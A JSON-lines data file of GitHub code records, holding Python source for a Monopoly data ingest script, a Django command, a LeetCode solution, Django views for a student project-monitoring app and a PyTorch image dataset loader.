+{"seq_id": "6888800239", "text": "import json\nfrom db import SessionLocal\nfrom models import BoardCell\n\n\ndef main():\n\n db = SessionLocal()\n\n with open(\"cells.json\") as f:\n data = json.load(f)\n direction_map = {\n \"top\": \"N\",\n \"left\": \"W\",\n \"right\": \"E\",\n \"bottom\": \"S\"\n }\n for direction in direction_map.keys():\n for cell in data[direction]:\n db.add(BoardCell(\n direction=direction_map[direction],\n cell_type=cell.get(\"type\"),\n color=cell.get(\"color\",\"\"),\n cell_id=cell.get(\"id\"),\n icon=cell.get(\"icon\", \"\"),\n label=cell.get(\"label\", \"\")\n ))\n\n db.commit()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "nakamura9/fw-monopoly", "sub_path": "ingest.py", "file_name": "ingest.py", "file_ext": "py", "file_size_in_byte": 801, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "db.SessionLocal", "line_number": 8, "usage_type": "call"}, {"api_name": "json.load", "line_number": 11, "usage_type": "call"}, {"api_name": "db.add", "line_number": 20, "usage_type": "call"}, {"api_name": "models.BoardCell", "line_number": 20, "usage_type": "call"}, {"api_name": "db.commit", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "3585213766", "text": "from django.core.management.base import BaseCommand\nfrom exp.models import ExpPlatform, PrepMethod\n\n\nPLATFORMS = [\n {\n 'method': '',\n 'kit': '',\n }\n]\n\n\nclass Command(BaseCommand):\n help = 'Creates a list of ExpPlatform objects from a given list'\n\n def handle(self, **options):\n for platform_dict in PLATFORMS:\n platform_obj, created = ExpPlatform.objects.get_or_create(\n method=platform_dict['method'],\n kit = platform_dict['kit']\n )\n if created:\n print(f'Project {platform_obj} created!')\n platform_obj.save()", "repo_name": "wjojf/ngsdb", "sub_path": "exp/management/commands/createprepmethods.py", "file_name": "createprepmethods.py", "file_ext": "py", "file_size_in_byte": 632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "django.core.management.base.BaseCommand", "line_number": 13, "usage_type": "name"}, {"api_name": "exp.models.ExpPlatform.objects.get_or_create", "line_number": 18, "usage_type": "call"}, {"api_name": "exp.models.ExpPlatform.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "exp.models.ExpPlatform", "line_number": 18, "usage_type": "name"}]}
+{"seq_id": "39096457897", "text": "from typing import Optional\n\nfrom Python.auxiliary.ListNode import ListNode\n\n\nclass Solution:\n def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:\n #\n # Solution v1.1: Brute Force\n #\n # Runtime: 40 ms @ (beats) 82.40%\n # Memory Usage: 14.1 MB @ (beats) 83.20%\n #\n # if not head or not head.next:\n # return head\n #\n # ans = ListNode()\n # ans.next = temp = ListNode(head.val)\n # while head:\n # if head.val > temp.val:\n # temp.next = ListNode(head.val)\n # temp = temp.next\n # head = head.next\n #\n # return ans.next\n\n #\n # Solution v1.2: Optimize\n #\n # Runtime: 36 ms @ (beats) 94.65%\n # Memory Usage: 14.3 MB @ (beats) 25.29%\n #\n if not head or not head.next:\n return head\n\n ans = ListNode()\n ans.next = temp = head\n while head:\n if head.val == temp.val:\n temp.next = head.next\n head = head.next\n\n return ans.next", "repo_name": "yogggithub/algorithm", "sub_path": "LeetCode/Python/solutions/p0083.py", "file_name": "p0083.py", "file_ext": "py", "file_size_in_byte": 1116, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "typing.Optional", "line_number": 7, "usage_type": "name"}, {"api_name": "Python.auxiliary.ListNode.ListNode", "line_number": 7, "usage_type": "name"}, {"api_name": "Python.auxiliary.ListNode.ListNode", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "25876237867", "text": "import random\r\nfrom django.shortcuts import render\r\nfrom django.http import HttpResponse, HttpResponseRedirect\r\nfrom django.urls import reverse\r\nfrom django.contrib.auth import authenticate, login, logout\r\nfrom PMS.forms import *\r\nfrom PMS.models import *\r\nfrom datetime import datetime\r\n\r\n# utility functions\r\ndef get_user_profile(user):\r\n if user.role == \"STUDENT\":\r\n return StudentProfile.objects.get(user=user)\r\n elif user.role == \"SUPERVISOR\":\r\n return SupervisorProfile.objects.get(user=user)\r\n \r\ndef get_project_title(project_id):\r\n return Project.objects.get(id=project_id)\r\n\r\ndef remove_duplicates_from_list(list):\r\n list_without_duplicates = []\r\n for element in list:\r\n if element not in list_without_duplicates:\r\n list_without_duplicates.append(element)\r\n return list_without_duplicates\r\n\r\n# Create your views here.\r\ndef index(request):\r\n if request.user.is_authenticated:\r\n return HttpResponseRedirect(reverse(\"home\"))\r\n else:\r\n return HttpResponseRedirect(reverse(\"login\"))\r\n \r\ndef login_view(request):\r\n if request.user.is_authenticated:\r\n return HttpResponseRedirect(reverse(\"home\"))\r\n if request.method == 'POST':\r\n username = request.POST['username']\r\n password = request.POST['password']\r\n user = authenticate(request, username=username, password=password)\r\n if user:\r\n login(request, user)\r\n # generate task overdue notifications for supervisors\r\n if request.user.role == \"SUPERVISOR\":\r\n supervisor_profile = SupervisorProfile.objects.get(user=user)\r\n student_profiles = StudentProfile.objects.filter(supervisor=supervisor_profile)\r\n projects = [student_profile.project for student_profile in student_profiles]\r\n for project in projects:\r\n tasks = Task.objects.filter(project=project)\r\n existing_overdue_notifications = Notification.objects.filter(type=\"TASK_OVERDUE\", overdue_task__project=project)\r\n tasks_in_existing_overdue_notifications = [notification.overdue_task for notification in existing_overdue_notifications]\r\n for task in tasks:\r\n if task.is_overdue() and task not in tasks_in_existing_overdue_notifications:\r\n new_overdue_notification = Notification(user=request.user, type=\"TASK_OVERDUE\", timestamp=task.due_date, overdue_task=task)\r\n new_overdue_notification.save()\r\n\r\n return HttpResponseRedirect(reverse('home'))\r\n else:\r\n return render(request, 'PMS/login.html', {\r\n \"failed_auth\": True\r\n })\r\n else:\r\n logged_out = request.GET.get('logout', False)\r\n return render(request, \"PMS/login.html\", {\r\n \"logged_out\": logged_out\r\n })\r\n\r\ndef logout_handler(request):\r\n logout(request)\r\n return HttpResponseRedirect(reverse(\"login\") + \"?logout=true\")\r\n\r\ndef home(request):\r\n def generate_random_icon():\r\n icons = [\"fa-code\", \"fa-share-alt\", \"fa-pie-chart\", \"fa-laptop\", \"fa-tasks\"]\r\n selected_icon = random.choice(icons)\r\n return selected_icon\r\n \r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n \r\n user_profile = get_user_profile(request.user)\r\n if request.user.role == \"SUPERVISOR\":\r\n projects = [student.project for student in StudentProfile.objects.filter(supervisor=user_profile)]\r\n else:\r\n projects = \"\"\r\n\r\n if request.user.role == \"STUDENT\":\r\n tasks = Task.objects.filter(project=user_profile.project).order_by(\"due_date\")\r\n first_four_unfinished_tasks = [task for task in tasks if not task.completed][:4]\r\n 
else:\r\n first_four_unfinished_tasks = \"\"\r\n\r\n notifications = Notification.objects.filter(user=request.user).order_by(\"-timestamp\")[:4]\r\n\r\n return render(request, \"PMS/home.html\", {\r\n \"user_profile\": user_profile,\r\n \"projects\": projects,\r\n \"first_four_unfinished_tasks\": first_four_unfinished_tasks,\r\n \"generate_random_icon\": generate_random_icon,\r\n \"notifications\": notifications\r\n })\r\n\r\ndef projects(request):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n if not request.user.role == \"SUPERVISOR\":\r\n return HttpResponse(\"403 Unauthorized\", status=403)\r\n user_profile = get_user_profile(request.user)\r\n students = StudentProfile.objects.filter(supervisor=user_profile)\r\n return render(request, \"PMS/projects.html\", {\r\n \"user_profile\": user_profile,\r\n \"students\": students\r\n })\r\n\r\ndef notifications(request):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n user_profile = get_user_profile(request.user)\r\n notification_list = Notification.objects.filter(user=request.user).order_by(\"-timestamp\")\r\n return render(request, \"PMS/notifications.html\", {\r\n \"user_profile\": user_profile,\r\n \"notification_list\": notification_list,\r\n })\r\n\r\ndef project(request, project_id):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n return HttpResponseRedirect(reverse(\"tasks\", kwargs={\"project_id\": project_id}))\r\n\r\ndef tasks(request, project_id):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n user_profile = get_user_profile(request.user)\r\n project_title = get_project_title(project_id)\r\n task_list = Task.objects.filter(project__id=project_id).order_by('due_date')\r\n subtask_list = Subtask.objects.filter(task__project__id=project_id)\r\n resource_list = Resource.objects.filter(project__id=project_id)\r\n message_list = TaskMessage.objects.filter(task__project__id=project_id)\r\n categories_with_duplicates = [task.category for task in task_list]\r\n categories = remove_duplicates_from_list(categories_with_duplicates)\r\n return render(request, \"PMS/tasks.html\", {\r\n \"user_profile\": user_profile,\r\n \"project_id\": project_id,\r\n \"project_title\": project_title,\r\n \"new_task_form\": NewTaskForm(),\r\n \"task_list\": task_list,\r\n \"subtask_list\": subtask_list,\r\n \"resource_list\": resource_list,\r\n \"message_list\": message_list,\r\n \"categories\": categories\r\n })\r\n\r\ndef add_task(request):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 Not Found\", status=404)\r\n else:\r\n project_id = request.POST.get(\"project_id\", \"\")\r\n title = request.POST.get(\"title\", \"\")\r\n category = request.POST.get(\"category\", \"\")\r\n start_date = request.POST.get(\"start_date\", \"\")\r\n due_date = request.POST.get(\"due_date\", \"\")\r\n description = request.POST.get(\"description\", \"\")\r\n dependency = request.POST.get(\"dependency\", \"\")\r\n # if all required values are truthy\r\n if (project_id and title and category and start_date and due_date and description):\r\n project = Project.objects.get(id=project_id)\r\n if dependency:\r\n dependency_task = Task.objects.get(id=dependency)\r\n else:\r\n dependency_task = None\r\n task = Task(project=project, title=title, category=category, start_date=start_date, due_date=due_date, description=description, dependency=dependency_task, 
completed=False)\r\n task.save()\r\n # creating a notification for the other party\r\n student_profile = StudentProfile.objects.get(project=project)\r\n if request.user.role == \"SUPERVISOR\":\r\n student = student_profile.user\r\n notification = Notification(user=student, type=\"NEW_TASK\", new_task=task)\r\n notification.save()\r\n elif request.user.role == \"STUDENT\":\r\n supervisor = student_profile.supervisor.user\r\n notification = Notification(user=supervisor, type=\"NEW_TASK\", new_task=task)\r\n notification.save()\r\n return HttpResponse(\"Success\")\r\n else:\r\n return HttpResponse(\"Bad request\", status=400)\r\n \r\ndef add_subtask(request):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 Not Found\", status=404)\r\n else:\r\n task_id = request.POST.get(\"task_id\", \"\")\r\n subtask_title = request.POST.get(\"subtask_title\", \"\")\r\n due_date = request.POST.get(\"due_date\", \"\")\r\n # if all values are truthy\r\n if (task_id and subtask_title and due_date):\r\n task = Task.objects.get(id=task_id)\r\n subtask = Subtask(task=task, title=subtask_title, due_date=due_date, completed=False)\r\n subtask.save()\r\n return HttpResponse(subtask.id)\r\n else:\r\n return HttpResponse(\"Bad request\", status=400)\r\n \r\ndef toggle_task_completion(request):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 Not Found\", status=404)\r\n else:\r\n task_id = request.POST.get(\"task_id\", \"\")\r\n # if all values are truthy\r\n if (task_id):\r\n task = Task.objects.get(id=task_id)\r\n task.completed = not task.completed\r\n task.save()\r\n return HttpResponse(\"Success\")\r\n else:\r\n return HttpResponse(\"Bad request\", status=400)\r\n \r\ndef toggle_subtask_completion(request):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 Not Found\", status=404)\r\n else:\r\n subtask_id = request.POST.get(\"subtask_id\", \"\")\r\n # if value is truthy\r\n if (subtask_id):\r\n subtask = Subtask.objects.get(id=subtask_id)\r\n subtask.completed = not subtask.completed\r\n subtask.save()\r\n return HttpResponse(\"Success\")\r\n else:\r\n return HttpResponse(\"Bad request\", status=400)\r\n \r\ndef send_task_message(request):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 Not Found\", status=404)\r\n else:\r\n task_id = request.POST.get(\"task_id\", \"\")\r\n task = Task.objects.get(id=task_id)\r\n message = request.POST.get(\"message\", \"\")\r\n user = request.user\r\n timestamp = datetime.now()\r\n # if value is truthy\r\n if (task and message and user and timestamp):\r\n task_message = TaskMessage(task=task, user=user, text=message, timestamp=timestamp)\r\n task_message.save()\r\n student_profile = StudentProfile.objects.get(project=task.project)\r\n if request.user.role == \"SUPERVISOR\":\r\n student = student_profile.user\r\n notification = Notification(user=student, type=\"CHAT_TASK\", chat_task=task)\r\n notification.save()\r\n elif request.user.role == \"STUDENT\":\r\n supervisor = student_profile.supervisor.user\r\n notification = Notification(user=supervisor, type=\"CHAT_TASK\", chat_task=task)\r\n notification.save()\r\n return HttpResponse(\"Success\")\r\n else:\r\n return HttpResponse(\"Bad request\", status=400)\r\n\r\ndef gantt(request, project_id):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n user_profile = get_user_profile(request.user)\r\n project_title = get_project_title(project_id)\r\n task_list = Task.objects.filter(project__id=project_id)\r\n return 
render(request, \"PMS/gantt.html\", {\r\n \"user_profile\": user_profile,\r\n \"project_id\": project_id,\r\n \"project_title\": project_title,\r\n \"task_list\": task_list\r\n })\r\n\r\ndef meeting_records(request, project_id):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n submitted = request.GET.get('submitted', '')\r\n status_updated = request.GET.get('statusUpdate', '')\r\n user_profile = get_user_profile(request.user)\r\n project_title = get_project_title(project_id)\r\n meeting_record_list = MeetingRecord.objects.filter(project__id=project_id).order_by('date')\r\n return render(request, \"PMS/meeting_records.html\", {\r\n \"submitted\": submitted,\r\n \"status_updated\": status_updated,\r\n \"user_profile\": user_profile,\r\n \"project_id\": project_id,\r\n \"project_title\": project_title,\r\n \"meeting_records\": meeting_record_list\r\n })\r\n\r\ndef add_meeting_record(request, project_id):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n if not request.user.role == \"STUDENT\":\r\n return HttpResponse(\"403 Unauthorized\", status=403)\r\n user_profile = get_user_profile(request.user)\r\n project_title = get_project_title(project_id)\r\n \r\n if request.method == \"POST\":\r\n form = NewMeetingRecordForm(request.POST)\r\n new_meeting_record= form.save(commit=False)\r\n supervisor = user_profile.supervisor\r\n new_meeting_record.student = f\"{user_profile.first_name} {user_profile.last_name}\"\r\n new_meeting_record.supervisor = f\"{supervisor.first_name} {supervisor.last_name}\"\r\n new_meeting_record.project = user_profile.project\r\n new_meeting_record.save()\r\n # generate notification for supervisor\r\n student_profile = user_profile\r\n supervisor = student_profile.supervisor.user\r\n notification = Notification(user=supervisor, type=\"NEW_MEETING_RECORD\", new_meeting_record=new_meeting_record)\r\n notification.save()\r\n return HttpResponseRedirect(reverse(meeting_records, kwargs={\"project_id\": project_id}) + \"?submitted=True\")\r\n\r\n return render(request, \"PMS/add_view_meeting_record.html\", {\r\n \"form\": NewMeetingRecordForm(),\r\n \"user_profile\": user_profile,\r\n \"project_id\": project_id,\r\n \"project_title\": project_title\r\n })\r\n\r\ndef view_edit_meeting_records(request, project_id, meeting_record_id):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n user_profile = get_user_profile(request.user)\r\n project_title = get_project_title(project_id)\r\n meeting_record = MeetingRecord.objects.get(id=meeting_record_id)\r\n meeting_record_form = NewMeetingRecordForm(instance=meeting_record)\r\n\r\n if request.method == \"GET\":\r\n return render(request, \"PMS/add_view_meeting_record.html\", {\r\n \"form\": meeting_record_form,\r\n \"meeting_record\": meeting_record,\r\n \"user_profile\": user_profile,\r\n \"project_id\": project_id,\r\n \"project_title\": project_title\r\n })\r\n elif request.method == \"POST\":\r\n form = NewMeetingRecordForm(request.POST)\r\n new_meeting_record= form.save(commit=False)\r\n supervisor = user_profile.supervisor\r\n new_meeting_record.student = f\"{user_profile.first_name} {user_profile.last_name}\"\r\n new_meeting_record.supervisor = f\"{supervisor.first_name} {supervisor.last_name}\"\r\n new_meeting_record.project = user_profile.project\r\n new_meeting_record.save()\r\n meeting_record.delete()\r\n # generate notification for supervisor\r\n student_profile = 
user_profile\r\n supervisor = student_profile.supervisor.user\r\n notification = Notification(user=supervisor, type=\"NEW_MEETING_RECORD\", new_meeting_record=new_meeting_record)\r\n notification.save()\r\n return HttpResponseRedirect(reverse(meeting_records, kwargs={\"project_id\": project_id}) + \"?statusUpdate=True\")\r\n\r\ndef approve_meeting_record(request, project_id):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 not found\", status=404)\r\n if request.user.role != \"SUPERVISOR\":\r\n # TODO: add logic to check if project is under supervisor\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n \r\n meeting_record_id = request.POST.get(\"id\", \"\")\r\n meeting_record = MeetingRecord.objects.get(id=meeting_record_id)\r\n meeting_record.approved = True\r\n meeting_record.save()\r\n # generate notification for students\r\n student = StudentProfile.objects.get(project=meeting_record.project).user\r\n notification = Notification(user=student, type=\"UPDATED_MEETING_RECORD\", updated_meeting_record=meeting_record)\r\n notification.save()\r\n return HttpResponseRedirect(reverse(meeting_records, kwargs={\"project_id\": project_id}) + \"?statusUpdate=True\")\r\n\r\ndef reject_meeting_record(request, project_id):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 not found\", status=404)\r\n if request.user.role != \"SUPERVISOR\":\r\n # TODO: add logic to check if project is under supervisor\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n \r\n meeting_record_id = request.POST.get(\"id\", \"\")\r\n reject_reason = request.POST.get(\"reject_reason\", \"\")\r\n meeting_record = MeetingRecord.objects.get(id=meeting_record_id)\r\n meeting_record.approved = False\r\n meeting_record.reject_reason = reject_reason\r\n meeting_record.save()\r\n # generate notification for students\r\n student = StudentProfile.objects.get(project=meeting_record.project).user\r\n notification = Notification(user=student, type=\"UPDATED_MEETING_RECORD\", updated_meeting_record=meeting_record)\r\n notification.save()\r\n return HttpResponseRedirect(reverse(meeting_records, kwargs={\"project_id\": project_id}) + \"?statusUpdate=True\")\r\n\r\ndef resources(request, project_id):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n user_profile = get_user_profile(request.user)\r\n project_title = get_project_title(project_id)\r\n resource_list = Resource.objects.filter(project__id=project_id)\r\n message_list = ResourceMessage.objects.filter(resource__project__id=project_id)\r\n categories_with_duplicates = [resource.category for resource in resource_list]\r\n categories = remove_duplicates_from_list(categories_with_duplicates)\r\n task_list = Task.objects.filter(project__id=project_id)\r\n return render(request, \"PMS/resources.html\", {\r\n \"user_profile\": user_profile,\r\n \"project_id\": project_id,\r\n \"project_title\": project_title,\r\n \"resource_list\": resource_list,\r\n \"message_list\": message_list,\r\n \"categories\": categories,\r\n \"task_list\": task_list,\r\n \"new_resource_form\": NewResourceForm(),\r\n })\r\n\r\ndef add_resource(request):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 Not Found\", status=404)\r\n else:\r\n project_id = request.POST.get(\"project_id\", \"\")\r\n title = request.POST.get(\"title\", \"\")\r\n category = request.POST.get(\"category\", \"\")\r\n description = request.POST.get(\"description\", \"\")\r\n file_name = request.FILES.get(\"file_name\", \"\")\r\n 
file_URL = request.POST.get(\"file_URL\", \"\")\r\n task_id = request.POST.get(\"task_id\", \"\")\r\n # if all values are truthy\r\n if (project_id and title and category and description):\r\n task = Task.objects.get(id=task_id) if task_id else None\r\n project = Project.objects.get(id=project_id)\r\n resource = Resource(project=project, task=task, title=title, category=category, description=description, file_name=file_name, file_URL=file_URL)\r\n resource.save()\r\n # generate notification for other party\r\n student_profile = StudentProfile.objects.get(project=project)\r\n if request.user.role == \"SUPERVISOR\":\r\n student = student_profile.user\r\n notification = Notification(user=student, type=\"NEW_RESOURCE\", new_resource=resource)\r\n notification.save()\r\n elif request.user.role == \"STUDENT\":\r\n supervisor = student_profile.supervisor.user\r\n notification = Notification(user=supervisor, type=\"NEW_RESOURCE\", new_resource=resource)\r\n notification.save()\r\n return HttpResponse(resource.id)\r\n else:\r\n return HttpResponse(\"Bad request\", status=400)\r\n \r\ndef send_resource_message(request):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 Not Found\", status=404)\r\n else:\r\n resource_id = request.POST.get(\"resource_id\", \"\")\r\n resource = Resource.objects.get(id=resource_id)\r\n message = request.POST.get(\"message\", \"\")\r\n user = request.user\r\n timestamp = datetime.now()\r\n # if value is truthy\r\n if (resource and message and user and timestamp):\r\n resource_message = ResourceMessage(resource=resource, user=user, text=message, timestamp=timestamp)\r\n resource_message.save()\r\n student_profile = StudentProfile.objects.get(project=resource.project)\r\n if request.user.role == \"SUPERVISOR\":\r\n student = student_profile.user\r\n notification = Notification(user=student, type=\"CHAT_RESOURCE\", chat_resource=resource)\r\n notification.save()\r\n elif request.user.role == \"STUDENT\":\r\n supervisor = student_profile.supervisor.user\r\n notification = Notification(user=supervisor, type=\"CHAT_RESOURCE\", chat_resource=resource)\r\n notification.save()\r\n return HttpResponse(\"Success\")\r\n else:\r\n return HttpResponse(\"Bad request\", status=400)", "repo_name": "sunram32/FYP-progress-monitoring", "sub_path": "PMS/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 21478, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.http.HttpResponseRedirect", "line_number": 30, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 30, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 32, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 32, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 36, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 36, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 40, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 42, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 57, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 57, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 64, "usage_type": "call"}, {"api_name": 
"django.contrib.auth.logout", "line_number": 69, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 70, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 70, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 75, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 79, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 95, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 105, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 107, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 110, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 117, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 120, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 127, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 128, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 128, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 132, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 141, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 155, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 183, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 185, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 189, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 199, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 201, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 205, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 213, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 215, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 219, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 227, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 229, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 233, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 239, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 239, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 253, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 255, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 259, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 263, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 272, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 278, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 289, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 291, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 308, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 308, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 310, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 319, 
"usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 326, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 347, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 347, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 351, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 354, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 364, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 364, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 368, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 371, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 383, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 383, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 387, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 395, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 408, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 433, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 435, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 439, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 445, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 445, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 459, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 461, "usage_type": "call"}]}
+{"seq_id": "12086272813", "text": "import cv2\nimport os\nimport torch\nfrom torch.utils.data import Dataset\nimport random\nimport numpy as np\nfrom train_pipeline.utils.edge_detector.edge_detector import EdgeDetector\n\n\ndef load_image(path):\n img = cv2.imread(path, 1)\n if img is None:\n print('IMAGGGGGGG', path)\n return cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n\nclass ImagenetLoader(Dataset):\n def __init__(self, folder_path, size=(224, 224)):\n self.images_pathes = [\n os.path.join(\n os.path.join(folder_path, subfolder_name),\n img_name\n )\n for subfolder_name in os.listdir(\n folder_path\n )\n for img_name in os.listdir(\n os.path.join(folder_path, subfolder_name)\n )\n ]\n\n self.size = size\n\n self.edge_detector = EdgeDetector()\n\n def __len__(self):\n return len(self.images_pathes)\n\n def __getitem__(self, idx):\n image = load_image(self.images_pathes[idx])\n image = cv2.resize(image, self.size)\n edge = self.edge_detector.detect(image)\n\n image = image.transpose(2, 0, 1)\n\n return torch.FloatTensor(image) / 255.0 - 0.5, \\\n torch.FloatTensor(edge).unsqueeze(0) / 255.0 - 0.5\n", "repo_name": "AlexeySrus/DeepFeaturesTransfer", "sub_path": "train_pipeline/utils/dataset_generator.py", "file_name": "dataset_generator.py", "file_ext": "py", "file_size_in_byte": 1264, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.imread", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.utils.data.Dataset", "line_number": 17, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 24, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "train_pipeline.utils.edge_detector.edge_detector.EdgeDetector", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 47, "usage_type": "call"}]}
